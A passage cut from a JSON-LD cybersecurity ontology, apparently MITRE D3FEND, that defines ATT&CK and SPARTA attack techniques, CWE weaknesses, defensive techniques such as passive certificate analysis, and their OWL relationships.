      "d3f:definition": "Adversaries may leverage external-facing remote services to initially access and/or persist within a network. Remote services such as VPNs, Citrix, and other access mechanisms allow users to connect to internal enterprise network resources from external locations. There are often remote service gateways that manage connections and credential authentication for these services. Services such as [Windows Remote Management](https://attack.mitre.org/techniques/T1021/006) and [VNC](https://attack.mitre.org/techniques/T1021/005) can also be used externally.(Citation: MacOS VNC software for Remote Desktop)",
      "d3f:produces": [
        {
          "@id": "d3f:Authentication"
        },
        {
          "@id": "d3f:Authorization"
        },
        {
          "@id": "d3f:NetworkSession"
        }
      ],
      "rdfs:label": "External Remote Services",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:InitialAccessTechnique"
        },
        {
          "@id": "d3f:PersistenceTechnique"
        },
        {
          "@id": "_:Nc7e0e562f0df4979b0c30c3986684104"
        },
        {
          "@id": "_:N111fabf574ab4044ba5c928eb79ed9bb"
        },
        {
          "@id": "_:Nf83ced6eebcb462bb3ee9c6e3cb855d9"
        }
      ]
    },
    {
      "@id": "_:Nc7e0e562f0df4979b0c30c3986684104",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:produces"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Authentication"
      }
    },
    {
      "@id": "_:N111fabf574ab4044ba5c928eb79ed9bb",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:produces"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Authorization"
      }
    },
    {
      "@id": "_:Nf83ced6eebcb462bb3ee9c6e3cb855d9",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:produces"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:NetworkSession"
      }
    },
    {
      "@id": "d3f:NIST_SP_800-53_R5_CM-5_1",
      "@type": [
        "owl:NamedIndividual",
        "d3f:NISTControl"
      ],
      "d3f:control-name": "Access Restrictions for Change | Automated Access Enforcement and Audit Records",
      "d3f:member-of": {
        "@id": "d3f:NIST_SP_800-53_R5"
      },
      "d3f:narrower": {
        "@id": "d3f:LocalAccountMonitoring"
      },
      "rdfs:label": "CM-5(1)"
    },
    {
      "@id": "d3f:Semi-supervisedCluster-then-label",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-SSCTL",
      "d3f:definition": "Pre-training methods are aimed to guide the parameters of a network towards interesting regions in model space using unlabeled data, before fine-tuning the parameters with the labeled data.",
      "d3f:kb-article": "## References\nJashish Shrestha. (n.d.). Beginner's Guide to Semi-Supervised Learning. [Link](http://jashish.com.np/blog/posts/beginners-guide-to-semi-supervised-learning/)",
      "rdfs:label": "Semi-supervised Cluster-then-label",
      "rdfs:subClassOf": {
        "@id": "d3f:UnsupervisedPreprocessing"
      }
    },
    {
      "@id": "d3f:DE-0002.02",
      "@type": "owl:Class",
      "d3f:attack-id": "DE-0002.02",
      "d3f:definition": "Threat actors may overwhelm/jam the downlink signal to prevent transmitted telemetry signals from reaching their destination without severe modification/interference, effectively leaving ground controllers unaware of vehicle activity during this time. Telemetry is the only method in which ground controllers can monitor the health and stability of the spacecraft while in orbit. By disabling this downlink, threat actors may be able to stop mitigations from taking place.",
      "rdfs:label": "Jam Link Signal - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/DE-0002/02/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:DE-0002"
      },
      "skos:prefLabel": "Jam Link Signal"
    },
    {
      "@id": "d3f:Reference-DeterministicMethodForDetectingAndBlockingOfExploitsOnInterpretedCode_K2CyberSecurityInc",
      "@type": [
        "owl:NamedIndividual",
        "d3f:PatentReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://patents.google.com/patent/US20190180036A1/en?oq=US-2019180036-A1"
      },
      "d3f:kb-abstract": "In one aspect, a method useful for preventing exploitation of a vulnerability in an interpreted code by monitoring and validating an execution of the interpreted code in a script file by an application server, includes the step of generating a mapping for an incoming network connection to a specified script file to be executed by an application server. The computerized method includes the step of inserting a hook for monitoring an application programming interface (API) call or a privileged instruction executed by the application server. The computerized method includes the step of inserting a validation code configured to validate the API call or the privileged instruction executed by the interpreted code in a script.",
      "d3f:kb-author": "Jayant Shukla",
      "d3f:kb-mitre-analysis": "This patent describes a technique for monitoring API calls. During execution of interpreted code the observed API calls are validated against a whitelist of API calls for that interpreted code file. Action is taken if the observed API call is not in accordance with the list.",
      "d3f:kb-organization": "K2 Cyber Security Inc",
      "d3f:kb-reference-of": {
        "@id": "d3f:SystemCallAnalysis"
      },
      "d3f:kb-reference-title": "Deterministic method for detecting and blocking of exploits on interpreted code",
      "rdfs:label": "Reference - Deterministic method for detecting and blocking of exploits on interpreted code - K2 Cyber Security Inc"
    },
    {
      "@id": "d3f:HTTPDeleteEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event where the HTTP DELETE method is used to delete the specified resource.",
      "rdfs:label": "HTTP DELETE Event",
      "rdfs:subClassOf": {
        "@id": "d3f:HTTPRequestEvent"
      }
    },
    {
      "@id": "d3f:T1604",
      "@type": "owl:Class",
      "d3f:attack-id": "T1604",
      "d3f:definition": "Adversaries may use a compromised device as a proxy server to the Internet. By utilizing a proxy, adversaries hide the true IP address of their C2 server and associated infrastructure from the destination of the network traffic. This masquerades an adversary’s traffic as legitimate traffic originating from the compromised device, which can evade IP-based restrictions and alerts on certain services, such as bank accounts and social media websites.(Citation: Threat Fabric Exobot)",
      "rdfs:label": "Proxy Through Victim - ATTACK Mobile",
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKMobileDefenseEvasionTechnique"
      },
      "skos:prefLabel": "Proxy Through Victim"
    },
    {
      "@id": "d3f:T1021.005",
      "@type": "owl:Class",
      "d3f:attack-id": "T1021.005",
      "d3f:definition": "Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to remotely control machines using Virtual Network Computing (VNC).  VNC is a platform-independent desktop sharing system that uses the RFB (“remote framebuffer”) protocol to enable users to remotely control another computer’s display by relaying the screen, mouse, and keyboard inputs over the network.(Citation: The Remote Framebuffer Protocol)",
      "rdfs:label": "VNC",
      "rdfs:subClassOf": {
        "@id": "d3f:T1021"
      }
    },
    {
      "@id": "d3f:REC-0001.05",
      "@type": "owl:Class",
      "d3f:attack-id": "REC-0001.05",
      "d3f:definition": "Adversaries seek a working map of the thermal architecture and its operating envelopes to anticipate stress points and plan timing for other techniques. Valuable details include passive elements (MLI, coatings, radiators, heat pipes/straps, louvers) and active control (survival and control heaters, thermostats, pumped loops), plus sensor placement, setpoints, deadbands, heater priority tables, and autonomy rules that protect critical hardware during eclipses and anomalies. Artifacts often come from thermal math models (TMMs), TVAC test reports, heater maps and harness drawings, command mnemonics, and on-orbit thermal balance procedures. When correlated with attitude constraints, payload duty cycles, and power budgets, this information lets a threat actor infer when components run close to limits, how safing responds to off-nominal gradients, and where power-thermal couplings can be exploited. Even small fragments, such as louver hysteresis or a heater override used for decontamination, can reveal opportunities to mask heating signatures or provoke nuisance safing.",
      "rdfs:label": "Thermal Control System - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/REC-0001/05/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:REC-0001"
      },
      "skos:prefLabel": "Thermal Control System"
    },
    {
      "@id": "d3f:modified-by",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x modified-by y: The entity x is changed by entity y.",
      "owl:inverseOf": {
        "@id": "d3f:modifies"
      },
      "rdfs:label": "modified-by",
      "rdfs:subPropertyOf": [
        {
          "@id": "d3f:associated-with"
        },
        {
          "@id": "d3f:may-be-modified-by"
        }
      ]
    },
    {
      "@id": "d3f:CWE-96",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-96",
      "d3f:definition": "The product receives input from an upstream component, but it does not neutralize or incorrectly neutralizes code syntax before inserting the input into an executable resource, such as a library, configuration file, or template.",
      "rdfs:label": "Improper Neutralization of Directives in Statically Saved Code ('Static Code Injection')",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-94"
      }
    },
    {
      "@id": "d3f:CWE-313",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-313",
      "d3f:definition": "The product stores sensitive information in cleartext in a file, or on disk.",
      "rdfs:label": "Cleartext Storage in a File or on Disk",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-312"
      }
    },
    {
      "@id": "d3f:T1584.007",
      "@type": "owl:Class",
      "d3f:attack-id": "T1584.007",
      "d3f:definition": "Adversaries may compromise serverless cloud infrastructure, such as Cloudflare Workers or AWS Lambda functions, that can be used during targeting. By utilizing serverless infrastructure, adversaries can make it more difficult to attribute infrastructure used during operations back to them.",
      "rdfs:label": "Serverless",
      "rdfs:subClassOf": {
        "@id": "d3f:T1584"
      }
    },
    {
      "@id": "d3f:T1181",
      "@type": "owl:Class",
      "d3f:attack-id": "T1181",
      "d3f:definition": "Before creating a window, graphical Windows-based processes must prescribe to or register a windows class, which stipulate appearance and behavior (via windows procedures, which are functions that handle input/output of data). (Citation: Microsoft Window Classes) Registration of new windows classes can include a request for up to 40 bytes of extra window memory (EWM) to be appended to the allocated memory of each instance of that class. This EWM is intended to store data specific to that window and has specific application programming interface (API) functions to set and get its value. (Citation: Microsoft GetWindowLong function) (Citation: Microsoft SetWindowLong function)",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by T1055.011",
      "rdfs:label": "Extra Window Memory Injection",
      "rdfs:seeAlso": {
        "@id": "d3f:T1055.011"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DefenseEvasionTechnique"
        },
        {
          "@id": "d3f:PrivilegeEscalationTechnique"
        }
      ]
    },
    {
      "@id": "d3f:FTPDeleteEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event where files or directories are removed from an FTP server, resulting in their permanent deletion from the remote system.",
      "rdfs:label": "FTP Delete Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:FTPEvent"
        },
        {
          "@id": "_:N2c760dbef5e74765a71319f59b952401"
        }
      ]
    },
    {
      "@id": "_:N2c760dbef5e74765a71319f59b952401",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:preceded-by"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:FTPPutEvent"
      }
    },
    {
      "@id": "d3f:CWE-198",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-198",
      "d3f:definition": "The product receives input from an upstream component, but it does not account for byte ordering (e.g. big-endian and little-endian) when processing the input, causing an incorrect number or value to be used.",
      "rdfs:label": "Use of Incorrect Byte Ordering",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-188"
      }
    },
    {
      "@id": "d3f:AssociationRuleLearning",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-ARL",
      "d3f:definition": "Association rule learning is a rule-based machine learning method for discovering interesting relations between variables in large databases.",
      "d3f:kb-article": "## References\nAssociation rule learning. (n.d.). Wikipedia. [Link](https://en.wikipedia.org/wiki/Association_rule_learning)",
      "rdfs:label": "Association Rule Learning",
      "rdfs:subClassOf": {
        "@id": "d3f:UnsupervisedLearning"
      }
    },
    {
      "@id": "d3f:T1608.006",
      "@type": "owl:Class",
      "d3f:attack-id": "T1608.006",
      "d3f:definition": "Adversaries may poison mechanisms that influence search engine optimization (SEO) to further lure staged capabilities towards potential victims. Search engines typically display results to users based on purchased ads as well as the site’s ranking/score/reputation calculated by their web crawlers and algorithms.(Citation: Atlas SEO)(Citation: MalwareBytes SEO)",
      "rdfs:label": "SEO Poisoning",
      "rdfs:subClassOf": {
        "@id": "d3f:T1608"
      }
    },
    {
      "@id": "d3f:EncryptedPassword",
      "@type": "owl:Class",
      "d3f:definition": "A password that is encrypted.",
      "rdfs:label": "Encrypted Password",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:EncryptedCredential"
        },
        {
          "@id": "d3f:Password"
        }
      ]
    },
    {
      "@id": "d3f:T1510",
      "@type": "owl:Class",
      "d3f:attack-id": "T1510",
      "d3f:definition": "Adversaries may abuse clipboard functionality to intercept and replace information in the Android device clipboard.(Citation: ESET Clipboard Modification February 2019)(Citation: Welivesecurity Clipboard Modification February 2019)(Citation: Syracuse Clipboard Modification 2014) Malicious applications may monitor the clipboard activity through the <code>ClipboardManager.OnPrimaryClipChangedListener</code> interface on Android to determine when the clipboard contents have changed.(Citation: Dr.Webb Clipboard Modification origin2 August 2018)(Citation: Dr.Webb Clipboard Modification origin August 2018) Listening to clipboard activity, reading the clipboard contents, and modifying the clipboard contents requires no explicit application permissions and can be performed by applications running in the background, however, this behavior has changed with the release of Android 10.(Citation: Android 10 Privacy Changes)",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by T1641.001",
      "rdfs:label": "Clipboard Modification - ATTACK Mobile",
      "rdfs:seeAlso": {
        "@id": "d3f:T1641.001"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKMobileImpactTechnique"
      },
      "skos:prefLabel": "Clipboard Modification"
    },
    {
      "@id": "d3f:T0813",
      "@type": "owl:Class",
      "d3f:attack-id": "T0813",
      "d3f:definition": "Adversaries may cause a denial of control to temporarily prevent operators and engineers from interacting with process controls. An adversary may attempt to deny process control access to cause a temporary loss of communication with the control device or to prevent operator adjustment of process controls. An affected process may still be operating during the period of control loss, but not necessarily in a desired state. (Citation: Corero) (Citation: Michael J. Assante and Robert M. Lee) (Citation: Tyson Macaulay)",
      "rdfs:label": "Denial of Control - ATTACK ICS",
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKICSImpactTechnique"
      },
      "skos:prefLabel": "Denial of Control"
    },
    {
      "@id": "d3f:T1642",
      "@type": "owl:Class",
      "d3f:attack-id": "T1642",
      "d3f:definition": "Adversaries may perform Endpoint Denial of Service (DoS) attacks to degrade or block the availability of services to users.",
      "rdfs:label": "Endpoint Denial of Service - ATTACK Mobile",
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKMobileImpactTechnique"
      },
      "skos:prefLabel": "Endpoint Denial of Service"
    },
    {
      "@id": "d3f:PassiveCertificateAnalysis",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:PassiveCertificateAnalysis"
      ],
      "d3f:d3fend-id": "D3-PCA",
      "d3f:definition": "Collecting host certificates from network traffic or other passive sources like a certificate transparency log and analyzing them for unauthorized activity.",
      "d3f:kb-article": "## How it works\nCertificates are analyzed outside of a TLS server connection using third-party secure update logs, domain name analysis and analytics.\n\n### Secure update certificate logs\n* Certificate Logs\nThe key enabling feature is a secure service that maintains record logs of certificate activities. The logs allow users to only append certificates and never to delete or modify the log entries. The logs use Merkle Tree Hashes to ensure they have not been tampered with. The logging service also allows for public auditing by any user.\n\nThe logging service, upon receipt of a certificate to log, will respond with a signed certificate timestamp (SCT). The SCT guarantees the certificate will be added to the log within the time specified. The SCT must be present with the certificate during a TLS handshake.\n\n* Certificate Monitoring\nCertificate monitoring, of the logs, is typically done by the CA and they watch for suspicious certificate logging and unusual certificates or extensions or permissions. Monitors are also responsible for verifying the logs are accurate and public.\n\n* Certificate Auditors\nLog integrity is verified by log auditors. Auditors make use of log proofs are used to validate the cryptographic hashes (Merkle Trees) that the log employs are consistent. In order to ensure consistency throughout multiple monitors and auditors, sharing a common logging service, gossip protocol is employed.\n\n### Phishing domain name analysis\n* A curated corpus of known benign domains and phishing domain names is used as training text for machine learning. Through the use of feature set extraction, vectors labels are created with scoring to indicated if they are considered benign or phishing domains.\n\n* A stream of new or updated SSL certificates with fully qualified domain names (FQDN) is analyzed against the feature vectors and a predictive model determines a score for the domains. The scoring considers distance measures such as Levenshtein distance to help in determining the final label score. Supervised learning is also employed using the curated domains of benign and phishing domains.\n\n* Subdomain phishing analysis, prepending a trusted domain to a phishing domain, and regular expression comparisons  are also used in the label scoring model. A tunable measure is used to determine the threshold for alerting. This measure helps to balance between precision and recall measures.\n\n## Considerations\n* Some entity will need to run the logging service and a trusted entity is preferred.\n* Certificate Authorities will likely need to monitor the logging service for consistency.\n* Certificate revocation is unchanged and remains outside of Certificate Transparency, but certificates needing to be revoked are visible.\n* Technique dependent of reliable feed of new and updated certificates\n* Some certificate authorities allow for certificates to be registered with wildcards in the FQDN and thus will fail some of the subdomain scoring\n* Phishing HTTP domains will not be discovered",
      "d3f:kb-reference": [
        {
          "@id": "d3f:Reference-CertificateTransparency"
        },
        {
          "@id": "d3f:Reference-StreamingPhish"
        }
      ],
      "rdfs:label": "Passive Certificate Analysis",
      "rdfs:subClassOf": {
        "@id": "d3f:CertificateAnalysis"
      }
    },
    {
      "@id": "d3f:Reference-CManualPointerArithmetic_GNU",
      "@type": [
        "owl:NamedIndividual",
        "d3f:UserManualReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://www.gnu.org/software/c-intro-and-ref/manual/html_node/Pointer-Arithmetic.html"
      },
      "d3f:kb-organization": "GNU",
      "d3f:kb-reference-of": {
        "@id": "d3f:MemoryBlockStartValidation"
      },
      "d3f:kb-reference-title": "Pointer Arithmetic in C",
      "rdfs:label": "Reference - Memory Block Start Validation - GNU C Manual"
    },
    {
      "@id": "d3f:FileFooterBlock",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A section at the end of a file that contains metadata or control information.",
      "rdfs:label": "File Footer Block",
      "rdfs:subClassOf": {
        "@id": "d3f:FileSection"
      }
    },
    {
      "@id": "d3f:T1222.002",
      "@type": "owl:Class",
      "d3f:attack-id": "T1222.002",
      "d3f:definition": "Adversaries may modify file or directory permissions/attributes to evade access control lists (ACLs) and access protected files.(Citation: Hybrid Analysis Icacls1 June 2018)(Citation: Hybrid Analysis Icacls2 May 2018) File and directory permissions are commonly managed by ACLs configured by the file or directory owner, or users with the appropriate permissions. File and directory ACL implementations vary by platform, but generally explicitly designate which users or groups can perform which actions (read, write, execute, etc.).",
      "rdfs:label": "Linux and Mac File and Directory Permissions Modification",
      "rdfs:subClassOf": {
        "@id": "d3f:T1222"
      }
    },
    {
      "@id": "d3f:ServiceRestartEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event describing the sequential stopping and starting of a service application to refresh its state, apply updates, or resolve operational issues.",
      "rdfs:label": "Service Restart Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ApplicationRestartEvent"
        },
        {
          "@id": "d3f:ServiceEvent"
        },
        {
          "@id": "_:Nd8f7b32e2bb045cfbef243bf1e52ac4d"
        },
        {
          "@id": "_:Nf71bdf48317a40aab7e8f826430cbe19"
        }
      ]
    },
    {
      "@id": "_:Nd8f7b32e2bb045cfbef243bf1e52ac4d",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:preceded-by"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ServiceStopEvent"
      }
    },
    {
      "@id": "_:Nf71bdf48317a40aab7e8f826430cbe19",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:precedes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ServiceStartEvent"
      }
    },
    {
      "@id": "d3f:ATTACKMobileCredentialAccessTechnique",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:enables": {
        "@id": "d3f:TA0031"
      },
      "rdfs:label": "Credential Access Technique - ATTACK Mobile",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ATTACKMobileTechnique"
        },
        {
          "@id": "_:N920742475f064ce181e6d3adcf90901e"
        }
      ],
      "skos:prefLabel": "Credential Access Technique"
    },
    {
      "@id": "_:N920742475f064ce181e6d3adcf90901e",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:enables"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:TA0031"
      }
    },
    {
      "@id": "d3f:T1558",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1558",
      "d3f:definition": "Adversaries may attempt to subvert Kerberos authentication by stealing or forging Kerberos tickets to enable [Pass the Ticket](https://attack.mitre.org/techniques/T1550/003). Kerberos is an authentication protocol widely used in modern Windows domain environments. In Kerberos environments, referred to as “realms”, there are three basic participants: client, service, and Key Distribution Center (KDC).(Citation: ADSecurity Kerberos Ring Decoder) Clients request access to a service and through the exchange of Kerberos tickets, originating from KDC, they are granted access after having successfully authenticated. The KDC is responsible for both authentication and ticket granting.  Adversaries may attempt to abuse Kerberos by stealing tickets or forging tickets to enable unauthorized access.",
      "d3f:may-access": {
        "@id": "d3f:KerberosTicket"
      },
      "d3f:may-create": {
        "@id": "d3f:KerberosTicket"
      },
      "rdfs:label": "Steal or Forge Kerberos Tickets",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CredentialAccessTechnique"
        },
        {
          "@id": "_:Na3d973f833ad4e35b2a1b1d1ae9ad1a1"
        },
        {
          "@id": "_:N7cbcb8cda0b24fd3a4377752ced2c5cd"
        }
      ]
    },
    {
      "@id": "_:Na3d973f833ad4e35b2a1b1d1ae9ad1a1",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-access"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:KerberosTicket"
      }
    },
    {
      "@id": "_:N7cbcb8cda0b24fd3a4377752ced2c5cd",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-create"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:KerberosTicket"
      }
    },
    {
      "@id": "d3f:T1218.002",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1218.002",
      "d3f:definition": "Adversaries may abuse control.exe to proxy execution of malicious payloads. The Windows Control Panel process binary (control.exe) handles execution of Control Panel items, which are utilities that allow users to view and adjust computer settings.",
      "d3f:invokes": {
        "@id": "d3f:CreateProcess"
      },
      "d3f:may-modify": {
        "@id": "d3f:SystemConfigurationDatabaseRecord"
      },
      "rdfs:label": "Control Panel",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1218"
        },
        {
          "@id": "_:Nc22740f6551c4c21956b8e456064bec0"
        },
        {
          "@id": "_:N0585126bd75e48a3879faa85f9395a82"
        }
      ]
    },
    {
      "@id": "_:Nc22740f6551c4c21956b8e456064bec0",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:invokes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:CreateProcess"
      }
    },
    {
      "@id": "_:N0585126bd75e48a3879faa85f9395a82",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-modify"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:SystemConfigurationDatabaseRecord"
      }
    },
    {
      "@id": "d3f:CWE-1115",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1115",
      "d3f:definition": "The source code contains elements such as source files that do not consistently provide a prologue or header that has been standardized for the project.",
      "rdfs:label": "Source Code Element without Standard Prologue",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-1078"
      }
    },
    {
      "@id": "d3f:process-environmental-variables",
      "@type": "owl:DatatypeProperty",
      "d3f:definition": "x process-environment-variables y: The process x has the process environmental variables data y.",
      "rdfs:label": "process-environmental-variables",
      "rdfs:subPropertyOf": {
        "@id": "d3f:process-data-property"
      },
      "skos:altLabel": "process-environmental-variable"
    },
    {
      "@id": "d3f:BitmapImageFile",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:contains": {
        "@id": "d3f:BitmapImage"
      },
      "d3f:definition": "A file that contains graphics data represented in a bitmap.",
      "rdfs:label": "Bitmap Image File",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ImageFile"
        },
        {
          "@id": "_:N512197e5f8454d49ac16248ac872aa82"
        }
      ]
    },
    {
      "@id": "_:N512197e5f8454d49ac16248ac872aa82",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:contains"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:BitmapImage"
      }
    },
    {
      "@id": "d3f:T1110.001",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:accesses": {
        "@id": "d3f:Password"
      },
      "d3f:attack-id": "T1110.001",
      "d3f:definition": "Adversaries with no prior knowledge of legitimate credentials within the system or environment may guess passwords to attempt access to accounts. Without knowledge of the password for an account, an adversary may opt to systematically guess the password using a repetitive or iterative mechanism. An adversary may guess login credentials without prior knowledge of system or environment passwords during an operation by using a list of common passwords. Password guessing may or may not take into account the target's policies on password complexity or use policies that may lock accounts out after a number of failed attempts.",
      "d3f:modifies": {
        "@id": "d3f:AuthenticationLog"
      },
      "d3f:produces": {
        "@id": "d3f:Authentication"
      },
      "rdfs:label": "Password Guessing",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1110"
        },
        {
          "@id": "_:N17ef02ac187c44a2ae0eb699d80a70c5"
        },
        {
          "@id": "_:N0817cf7081264a599fd1dd95e5ed4d2a"
        },
        {
          "@id": "_:N8e2d12cb9fcf4b5eb1b2c2bd9288f184"
        }
      ]
    },
    {
      "@id": "_:N17ef02ac187c44a2ae0eb699d80a70c5",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:accesses"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Password"
      }
    },
    {
      "@id": "_:N0817cf7081264a599fd1dd95e5ed4d2a",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:AuthenticationLog"
      }
    },
    {
      "@id": "_:N8e2d12cb9fcf4b5eb1b2c2bd9288f184",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:produces"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Authentication"
      }
    },
    {
      "@id": "d3f:DisplayDeviceDriver",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A device driver for a display adapter.",
      "d3f:drives": {
        "@id": "d3f:DisplayAdapter"
      },
      "rdfs:label": "Display Device Driver",
      "rdfs:seeAlso": [
        {
          "@id": "dbr:Device_driver"
        },
        {
          "@id": "dbr:Display_adapter"
        }
      ],
      "rdfs:subClassOf": [
        {
          "@id": "d3f:HardwareDriver"
        },
        {
          "@id": "_:N2d4ab841c0414f97afc8236787136cb4"
        }
      ]
    },
    {
      "@id": "_:N2d4ab841c0414f97afc8236787136cb4",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:drives"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:DisplayAdapter"
      }
    },
    {
      "@id": "d3f:Software-definedRadioWaveformConfigurationEvent",
      "@type": "owl:Class",
      "d3f:definition": "An SDR event where the waveform application's operational parameters have been applied and validated (e.g., sample rate, bandwidth, channel selection, framing/modulation options), placing the waveform in a state ready to run.",
      "rdfs:label": "Software-defined Radio Waveform Application Configuration Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:Software-definedRadioEvent"
        },
        {
          "@id": "_:N9e51dc3b268447f6bd88fe80a797b170"
        },
        {
          "@id": "_:Nda10afb67f8e4d309e1204f6b7c64810"
        }
      ]
    },
    {
      "@id": "_:N9e51dc3b268447f6bd88fe80a797b170",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:has-participant"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Software-definedRadioComputer"
      }
    },
    {
      "@id": "_:Nda10afb67f8e4d309e1204f6b7c64810",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:has-participant"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Software-definedRadioWaveformApplication"
      }
    },
    {
      "@id": "d3f:DomainAccountMonitoring",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:DomainAccountMonitoring"
      ],
      "d3f:d3fend-id": "D3-DAM",
      "d3f:definition": "Monitoring the existence of or changes to Domain User Accounts.",
      "d3f:kb-reference": {
        "@id": "d3f:Reference-AuditUserAccountManagement"
      },
      "d3f:monitors": {
        "@id": "d3f:DomainUserAccount"
      },
      "rdfs:label": "Domain Account Monitoring",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:UserBehaviorAnalysis"
        },
        {
          "@id": "_:N4917db4f05204a9385c1af0c29225006"
        }
      ]
    },
    {
      "@id": "_:N4917db4f05204a9385c1af0c29225006",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:monitors"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:DomainUserAccount"
      }
    },
    {
      "@id": "d3f:REC-0009",
      "@type": "owl:Class",
      "d3f:attack-id": "REC-0009",
      "d3f:definition": "Adversaries compile a CONOPS-level portrait of the mission to predict priorities, constraints, and operational rhythms. They harvest stated needs, goals, and performance measures; enumerate key elements/instruments and their duty cycles; and extract mode logic, operational constraints (pointing, keep-outs, contamination, thermal/power margins), and contingency concepts. They mine the scientific and engineering basis, papers, algorithms, calibration methods, to anticipate data value, processing chains, and where integrity or availability attacks would have maximal effect. They correlate physical and support environments (ground networks, cloud pipelines, data distribution partners, user communities) and public schedules (campaigns, calibrations, maneuvers) to identify periods of elevated workload or reduced margin. The aim is not merely understanding but timing: choosing moments when authentication might be relaxed, monitoring is saturated, or rapid-response authority is invoked.",
      "rdfs:label": "Gather Mission Information - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/REC-0009/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:SPARTAReconnaissanceTechnique"
      },
      "skos:prefLabel": "Gather Mission Information"
    },
    {
      "@id": "d3f:EX-0012.05",
      "@type": "owl:Class",
      "d3f:attack-id": "EX-0012.05",
